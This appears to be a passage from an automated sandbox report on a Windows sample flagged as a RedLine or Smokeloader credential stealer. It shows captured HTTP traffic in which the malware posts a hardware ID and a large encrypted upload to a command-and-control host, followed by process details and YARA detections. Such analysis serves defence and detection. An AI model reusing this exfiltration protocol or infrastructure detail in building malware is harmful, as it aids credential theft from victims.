2024-12-18 19:54:27 UTC | 5107 | OUT | Data Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-18 19:54:30 UTC | 1043 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 19:54:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=23oqe8r3lqv597l4k7cavko8fl; expires=Sun, 13-Apr-2025 13:41:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yK5SGyKmsFJfXpGRJeJBcnuFYHFmLtewNWCBMdOCNpnYKTN7FsJq%2FdQ%2FJf3VEFJ59cE%2BaOvFCRBLZeOt1v3XfxrySAkGGasmxhSSz2ndY56MXsfbO3aLz9Vt4%2BHXZCIx1A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f41b4704ae61a03-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1842&rtt_var=705&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=21399&delivery_rate=1536842&cwnd=142&unsent_bytes=0&cid=f1916668e75c9cd7&ts=3888&x=0"
2024-12-18 19:54:30 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 19:54:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49737 | 104.21.21.99 | 443 | 7736 | C:\Users\user\Desktop\k6A01XaeEn.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 19:54:32 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5FSAVCL8ZA8U7M6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1231
Host: discokeyus.lat
2024-12-18 19:54:32 UTC | 1231 | OUT | Data Raw: 2d 2d 35 46 53 41 56 43 4c 38 5a 41 38 55 37 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 46 53 41 56 43 4c 38 5a 41 38 55 37 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 46 53 41 56 43 4c 38 5a 41 38 55 37 4d 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 35 46 53 41 56 43 4c 38 5a 41
Data Ascii: --5FSAVCL8ZA8U7M6Content-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--5FSAVCL8ZA8U7M6Content-Disposition: form-data; name="pid"1--5FSAVCL8ZA8U7M6Content-Disposition: form-data; name="lid"4h5VfH----5FSAVCL8ZA
2024-12-18 19:54:37 UTC | 1044 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 19:54:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=n9ok9apqtlk21cskba2g8qo7ae; expires=Sun, 13-Apr-2025 13:41:14 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3VNV1OP6APcTV9w3sI%2B9tmcmcxZVme6Hac%2F%2FUpm5kTLVA6Q0ivNvB7a%2F4yqvQV%2BJivCdXfM6STLJRRPds0zeufGQH2SMXITvyS5dcVZGo4x1YGQ%2FDF5J2eHiX8dWfqGomg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f41b495492941f9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1616&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=2143&delivery_rate=1789215&cwnd=212&unsent_bytes=0&cid=00294e3948938015&ts=4545&x=0"
2024-12-18 19:54:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-18 19:54:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 104.21.21.99 | 443 | 7736 | C:\Users\user\Desktop\k6A01XaeEn.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 19:54:39 UTC | 281 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2HG77GWVKDAUVJU866
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 568750
Host: discokeyus.lat
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: 2d 2d 32 48 47 37 37 47 57 56 4b 44 41 55 56 4a 55 38 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 39 38 38 41 34 34 42 32 30 44 43 45 34 41 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 48 47 37 37 47 57 56 4b 44 41 55 56 4a 55 38 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 48 47 37 37 47 57 56 4b 44 41 55 56 4a 55 38 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 32
Data Ascii: --2HG77GWVKDAUVJU866Content-Disposition: form-data; name="hwid"93988A44B20DCE4AAC8923850305D13E--2HG77GWVKDAUVJU866Content-Disposition: form-data; name="pid"1--2HG77GWVKDAUVJU866Content-Disposition: form-data; name="lid"4h5VfH----2
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: 8c e3 85 ef a3 0b 05 97 fc 2a de 1d d4 60 8d 65 9c ea c4 83 9e 0b 1e 34 c7 56 6f 8b f3 bf 86 e2 8f 8a d0 3c a0 9b 68 52 32 f1 cf 05 17 67 a6 c1 8e 6d f9 83 09 4c 0c 23 9a e1 74 34 53 7b 65 a2 2f fb 55 d2 1d 9a ac 50 57 50 b8 46 77 c6 f9 66 2d 33 90 8b c2 34 dc d1 60 f1 c5 52 a4 12 ff 0d 37 5f 2e 01 78 e5 af 23 91 82 1f 6f 6b ad 1d 60 b5 6f 84 05 bf 16 a6 a6 ed 27 04 6a 8f b0 3a ff b0 b4 1c 63 06 a5 6a a3 19 31 52 f4 38 dc d6 f8 9a cd 85 b8 a9 97 9f 2d 94 2b 64 26 9f d5 b7 ea a2 6c 84 23 37 e0 64 dd ad bc 69 e2 74 74 58 b2 1f a6 eb f2 55 c5 d4 50 10 d4 f5 b5 c9 5a 8d 4d ee bb ed 16 69 58 67 28 b7 2a df 23 99 68 d3 61 85 2d 3b 56 cb 50 9b 5a 50 96 7a 2a 4a a2 5b 8e d5 27 b7 88 7e 0f b9 6b 2f 81 81 30 89 fd af be 0e 7d fe 98 af ba d4 d6 e8 40 d8 02 6b 6d 9c
Data Ascii: *`e4Vo<hR2gmL#t4S{e/UPWPFwf-34`R7_.x#ok`o'j:cj1R8-+d&l#7dittXUPZMiXg(*#ha-;VPZPz*J['~k/0}@km
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: 59 73 ca 7e 8a b7 33 30 06 4f 50 ea b3 1b 45 cd 1c 8f 2f cf fd 8a 06 ad 3a ec 01 90 72 f3 78 13 6f c5 45 61 a6 4a e2 ab ac aa 96 dd ff 86 ba fe 53 09 b3 d1 88 d9 ec d8 1b fc 1f 5d 7b f1 ad 11 03 10 27 0d 82 e9 5c a3 78 08 df 33 ee 94 e9 10 eb 73 6b aa b1 83 9f fb 01 ce c0 46 f6 ed cc 3b 6d 5c 81 71 5e 20 d6 b9 53 73 73 76 ed cc cb 37 8c 09 f6 c5 3c 51 c1 7c 7b 14 e9 3f 44 53 8d 0a 91 40 bd 2c 46 9c f0 0a a8 64 00 dd 3d b6 ad 37 29 f5 bd c2 c0 4a 3b a5 55 e8 9e 99 57 af 1c 55 00 a7 94 87 80 b5 cf 3e ab 0a 85 87 09 e3 98 b0 a9 5f 21 99 ca 47 d8 8b 60 f3 07 11 4c 0c 53 e5 f6 da 4b 51 f5 d8 80 47 a2 c9 6e f1 5b 87 f9 4f 3d cc 6c 41 23 e0 4f 74 e1 eb 17 24 60 b4 a6 09 6f 13 98 15 8e 83 0c 5f e1 be 0d 58 57 80 34 0e 33 64 e4 1b ff 31 3c 1e 68 e6 9a bb 90 a4 5a
Data Ascii: Ys~30OPE/:rxoEaJS]{'\x3skF;m\q^ Sssv7<Q|{?DS@,Fd=7)J;UWU>_!G`LSKQGn[O=lA#Ot$`o_XW43d1<hZ
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: 1f 32 37 85 8d 8d e8 36 2e 91 e7 79 9e ef 52 f2 13 9a ce 33 ab 56 ba 3f f9 66 20 11 77 d2 25 2c ed 7b d3 94 56 66 d1 29 52 fa 3e e9 7d 6b b4 b0 2a 61 db 07 24 1b a7 a8 b3 69 cc a6 36 32 2a b5 30 a1 d5 44 77 f9 d5 8d aa 8f d0 2f ae 1f 18 1d 21 16 e0 98 8a 24 38 bb 0b c3 f8 c3 78 69 0f 6c f7 84 eb f0 78 0b d1 10 e1 8b 4d 35 33 9d 01 3b ab 3c d0 1c 07 d1 e7 de 36 fc 87 57 ab f9 36 bc a3 81 30 e7 7a cf cb 51 d3 1e 86 31 70 7b ff d9 c5 60 11 c9 45 2f 3b 41 83 ff f2 43 23 c4 2f f7 17 f6 03 11 3e 26 3f 38 2b 96 bd b1 1e 79 c5 0e 3b 37 96 6f 3a 01 ea 31 dd 17 38 dc bc 49 9c e0 07 e7 66 3e 2d be b1 0b 6a c8 c8 af 81 f3 7e 3a 17 e0 e6 eb d5 4f 7d be 40 af 8d 70 34 5c 08 76 11 7c 06 5f f2 b0 2d 7b 5d 9a 7c 83 6a 66 15 2e b7 35 ce ff 61 1a a2 61 08 91 bf d2 b6 35 4c
Data Ascii: 276.yR3V?f w%,{Vf)R>}k*a$i62*0Dw/!$8xilxM53;<6W60zQ1p{`E/;AC#/>&?8+y;7o:18If>-j~:O}@p4\v|_-{]|jf.5aa5L
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: 5e 58 6c 60 9a 89 a7 db 74 15 f3 74 20 0d f5 4e 1e b7 0a e0 6f 9a 65 88 35 41 f9 25 b7 59 85 29 b0 56 a8 6d 5b 8f 7d d9 99 81 10 cf 94 d5 a2 95 08 b8 a8 40 8f e7 b3 d8 e8 ef 7f 34 a0 25 82 e1 61 21 51 25 0f dc d2 95 a6 dc 3f 35 f9 4b 8e 2a 91 94 c8 e0 d1 21 cc 00 d7 09 e2 3b 91 97 42 4b f4 e5 9c 2e 22 a1 63 18 8e 0c 05 00 b8 0f 9c 0f 76 d9 98 cf 08 6f 6e 10 a9 1f 76 32 c2 48 43 50 79 6f f4 4a d2 82 1a 4b 85 76 2c e2 f0 d0 be 12 14 06 4f 7e 09 27 79 17 b0 27 94 c4 af 20 6e dd c0 47 5c 50 e3 6b 09 91 93 6a 2c d6 42 8a 7c c8 34 84 34 5e d8 d9 92 9f 06 bc 7b aa 75 88 6e a3 10 23 cb e9 5a 3b 83 d4 9e e7 15 6e 4e 8b ba 0c da 39 f1 a8 d5 0e 07 ed 49 e4 ad 24 ef a4 ac 24 a2 ed c8 8c 20 10 ad 3f b1 1f 78 e6 f7 52 7a 01 f5 9a 0c 34 cf a5 e1 fd 11 7a 8f 09 23 f5 55
Data Ascii: ^Xl`tt Noe5A%Y)Vm[}@4%a!Q%?5K*!;BK."cvonv2HCPyoJKv,O~'y' nG\Pkj,B|44^{un#Z;nN9I$$ ?xRz4z#U
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: e2 8c 2f 4e 46 e8 06 91 af 90 9b 56 54 a8 e5 3b c6 3c 22 94 c8 d0 ad 79 57 3e be eb 97 1c 46 95 9e 29 4d 72 cc dc c9 37 f9 2e 2b 79 54 6b 73 0a 7a 79 d2 da 84 2f 6d 6f d2 9e e6 8b 27 6a eb 23 1d 01 22 36 d3 6b f9 2c 26 ab 95 a1 82 ff 15 6c 88 74 dc 19 d9 ed 3a 3b 2e b3 bc b8 58 22 28 42 db cf 97 a7 03 fa 26 9e 46 52 1c 3a 26 48 0b 9b be ed c2 17 5f 63 27 58 45 9d 51 20 59 3b b1 ad 37 76 c0 a6 4d a4 bb e8 63 8f 65 88 a3 50 3d 23 bf 75 cb 0e 7c 39 20 92 4e 88 5b 78 2e 8e 8a d9 81 4b 8f 2e cd 5e 58 c1 25 13 72 d6 d7 99 ff 70 d9 c0 9a 27 53 ab c7 ae 18 e2 c5 f2 f2 c8 30 13 5e 2a ed 79 b7 d2 a3 af 64 3b 48 f1 dc 3c 8b 77 08 99 a9 f6 5a d9 02 5b 85 37 f8 89 df ae 80 5b af 32 75 81 ce 72 b3 7f 05 52 66 ee b3 27 b5 f3 38 d1 9c 60 ea 14 98 59 6f ca 0f 0e f1 b5 6c
Data Ascii: /NFVT;<"yW>F)Mr7.+yTkszy/mo'j#"6k,&lt:;.X"(B&FR:&H_c'XEQ Y;7vMceP=#u|9 N[x.K.^X%rp'S0^*yd;H<wZ[7[2urRf'8`Yol
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: dd f2 fd 8a 0d 26 78 4d 6f 70 96 51 1e eb dd 3e 90 35 b8 38 91 6e 99 18 42 13 62 b4 b7 5c d6 ee 5f ac 09 70 af 9a be 42 25 ae 77 a1 ab 03 c2 44 c3 62 82 9b 64 d2 9b 0d 0b 7a 9a 43 e7 45 88 4b bf 0c 6b 6c a8 63 26 1c 05 12 11 ae 3a d7 50 28 79 b7 67 6a 5f f8 78 19 20 6b 25 d4 35 1c fe cf 46 fd 9f b2 0e 9d c7 69 43 48 01 d4 1e 1a 31 8e 90 a4 4d b9 b6 cc c9 bb b3 11 ee 73 a0 e9 17 ee a6 44 8d 63 30 b4 f9 d3 ad b8 00 e9 06 c3 63 cf 21 de 0f dc 14 01 67 45 69 ff f0 9c 5d d8 ad ef bc e4 74 9b 95 cd 5f 8e f9 0f 80 bf 31 8c f1 f6 54 3f c9 4c 89 ba 61 55 f9 08 1e 0f 82 54 84 0f 00 eb 14 58 57 b2 d5 d7 dc 04 36 8d 0e f1 c1 ec df 35 a0 05 ee e3 da 5b a1 57 72 b8 33 53 36 92 0a 5d 39 da 50 a6 64 44 a1 88 7e 53 44 47 6b f0 68 16 be af 08 34 1e 09 3c cb 47 48 7b 59 7f
Data Ascii: &xMopQ>58nBb\_pB%wDbdzCEKklc&:P(ygj_x k%5FiCH1MsDc0c!gEi]t_1T?LaUTXW65[Wr3S6]9PdD~SDGkh4<GH{Y
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: ad fe 24 9b 58 8a 54 6b 71 da 83 71 cc a8 40 0b 48 b8 9f b0 bd 1c 8b f4 b9 bf 60 8a 30 92 f4 c7 ad ef 11 17 7e ad 80 17 ee b3 2d b0 ef be 18 61 b8 cd 7a 91 ef a9 a3 db 46 c9 f2 95 34 ae 8d 5f 01 98 01 dd 7e ea 35 6d e6 16 97 09 62 77 89 d6 df 95 8b 11 25 ea 3b ca 10 5e 27 0e c1 02 bf 3a 7f 5b aa c6 39 8b 4b f7 19 84 5f 7f ad c8 13 63 07 a5 28 3c 43 0c a7 c6 7a 73 88 59 69 29 dc fe 23 f8 e6 a3 b0 21 96 bd 77 d2 78 ca e3 f6 d7 81 57 ab 05 ad 37 d8 10 22 81 70 c0 0d 0d 2e 87 5e 98 8f f9 99 82 02 9d 26 91 5e 23 ee 77 41 61 d8 60 7f 39 af 3d 51 72 1e 8c fe c7 e8 e2 15 c0 85 1b 35 32 e7 d2 96 6f 84 5d 49 8a 57 f8 6a 02 48 8d b1 95 f9 b6 bf 67 7e 0c d3 cf af be 3b 75 59 a6 53 d7 a9 24 f7 9b ad c4 39 01 fc d5 56 51 bb c7 7b 68 b4 9f f1 7e a3 6a 63 6b 73 ba 9c da
Data Ascii: $XTkqq@H`0~-azF4_~5mbw%;^':[9K_c(<CzsYi)#!wxW7"p.^&^#wAa`9=Qr52o]IWjHg~;uYS$9VQ{h~jcks
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: 14 9c d3 cf 87 0b 2f 5f b2 b2 37 05 29 83 89 33 e3 09 c3 61 32 11 ce a0 e9 07 54 bd cd 52 ba 37 ea cc 17 e1 8e 0d 74 a4 b0 e8 19 04 9c 05 53 58 9c ec 3c 3c 6a 42 fd 83 8a 8b 93 f9 95 63 78 7b 67 e7 c6 83 35 d9 52 e0 e0 83 a8 8b c7 7b ea ac fe 1e 71 9e 26 9b 1d ad 1e 8f f7 95 81 a9 f7 70 ad 23 02 29 5c 86 e2 4d ad 0f 3f 0b 6a cf 97 81 9e 2b 31 4a 0c 7b e0 c4 57 48 bc 3b 56 57 f4 2d 53 1b 61 a5 6f af 89 d7 4f b0 ac e0 cb 09 71 2c 79 77 79 35 ad 82 fa 74 a2 bc ed 7a 21 2e bc 18 35 76 41 82 aa 97 da 3e 17 1b 43 4d 93 b0 0f a0 aa 6c 7a b8 1a 86 a6 47 05 f8 2d cc 9d 9e 59 90 9f 02 c7 49 f6 63 aa ca 0c 05 c3 56 c5 28 8d 59 54 cb b3 11 07 af f5 42 74 d4 d1 a6 58 ef dd d8 05 e5 60 42 b7 f0 aa 23 07 f1 5b ac e6 28 ff 6e 54 c8 f5 8c dd 78 03 8b 16 a3 82 ab 2b 18 de
Data Ascii: /_7)3a2TR7tSX<<jBcx{g5R{q&p#)\M?j+1J{WH;VW-SaoOq,ywy5tz!.5vA>CMlzG-YIcV(YTBtX`B#[(nTx+
2024-12-18 19:54:39 UTC | 15331 | OUT | Data Raw: 6a 02 f7 d9 32 33 5a 85 df 5f 5e ee 1b b0 5e 1c 62 06 aa da 50 ac 72 15 d0 ba 00 68 0c 1c 94 78 45 15 b0 43 0e 94 dc 2c b5 a0 7d b7 05 e0 e3 06 77 58 49 8f ce 9f 6c eb 7f 57 6e 17 84 97 f3 64 7d c3 c8 f5 42 aa ad bd 90 93 65 f0 65 0b 1c 11 d0 fa 37 9d 12 5d e9 df b6 47 07 ac bc 3a af 67 c2 7f 3f 72 62 9b 0c 47 27 d4 e3 9f f0 19 55 dd 1f 63 61 04 d0 58 37 f3 19 c9 fa 06 41 ff f7 64 e0 2f 7f cf b2 86 73 8f 2b 62 88 c6 37 28 da 86 11 c2 3b 59 b6 53 1c 74 6d 3d 72 8d 20 87 3c 4d 72 8e 93 da b4 66 95 ba 23 db 91 7c ff 4e ee 97 2c 12 95 ca 8d c7 a3 bc 2a 89 8a 0d a2 b5 e9 a7 bc 5d bb e3 3b 55 e4 f2 5a c2 4b 9a 07 9a 6e d9 fc 3d df 1e a5 d7 32 5c 27 4d 68 88 a8 e1 cf a7 e0 a0 3f 36 ac ee c3 ca c0 68 d7 0b 12 9b fa b4 ee 0f 60 53 ce b2 60 98 84 98 dc 37 6b 57 ec
                                                                                              Data Ascii: j23Z_^^bPrhxEC,}wXIlWnd}Bee7]G:g?rbG'UcaX7Ad/s+b7(;YStm=r <Mrf#|N,*];UZKn=2\'Mh?6h`S`7kW
                                                                                              2024-12-18 19:54:45 UTC1042INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 19:54:45 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=j5vegmvqa2s52q3mii40iqvm0d; expires=Sun, 13-Apr-2025 13:41:21 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=552RpzpYLcXszUjz7U7W%2BnKYpSMRf2eQTkqtEIHo6fbHTRl31XNZ3aSdOgky%2Bt9IfUxGxUd2SKtRykjzjAIabxvERkCC5GNkyJKbYnjVmWyjEHPOICst67vlUfQ350vq5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b4bc9d108c5f-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1957&rtt_var=750&sent=202&recv=591&lost=0&retrans=0&sent_bytes=2833&recv_bytes=571295&delivery_rate=1443400&cwnd=171&unsent_bytes=0&cid=f51707b11bb2f167&ts=6282&x=0"

                                                                                              Target ID:0
                                                                                              Start time:14:54:11
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\k6A01XaeEn.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:368'640 bytes
                                                                                              MD5 hash:FD5FE344FEF63284ED51951698535FCA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2340966551.0000000000A79000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1940934471.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1940699958.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2340676868.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:14:54:46
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 1672
                                                                                              Imagebase:0xe60000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              No disassembly